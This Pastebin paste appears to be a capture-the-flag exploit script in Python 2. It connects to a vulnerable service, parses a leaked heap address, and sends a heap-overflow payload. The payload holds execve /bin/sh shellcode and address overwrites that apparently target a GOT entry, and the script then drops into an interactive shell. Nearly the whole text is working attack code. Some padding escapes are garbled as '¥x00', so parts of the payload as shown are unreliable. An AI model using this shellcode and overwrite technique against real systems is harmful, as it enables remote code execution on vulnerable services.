Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # -*- coding: utf-8 -*-
- import socket, struct, re, telnetlib
- ###################### useful function definition
- def sock(remoteip, remoteport):
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((remoteip, remoteport))
- return s, s.makefile('rw', bufsize=0)
- def read_until(f, delim='\n'):
- data = ''
- while not data.endswith(delim):
- data += f.read(1)
- return data
- def p(a):
- return struct.pack("<I",a)
- def shell(s):
- t = telnetlib.Telnet()
- t.sock = s
- t.interact()
- ###################### main
- # linux/x86/execve_binsh
- shellcode = "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
- s, f = sock("localhost", 4088)
- #s, f = sock("katagaitai.orz.hm", 1111)
- ret = read_until(f, "Write to object [size=260]:")
- print ret
- heap_addr = int(re.findall(r"loc=([^]]+)", ret)[10], 16)
- print hex(heap_addr)
- sc = "\xeb\x08" + '¥x00'*8 + shellcode.ljust(250, '¥x00') + p(0xfffffffd) + p(0x0804C004-8) + p(heap_addr)
- f.write(sc + "\n")
- shell(s)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
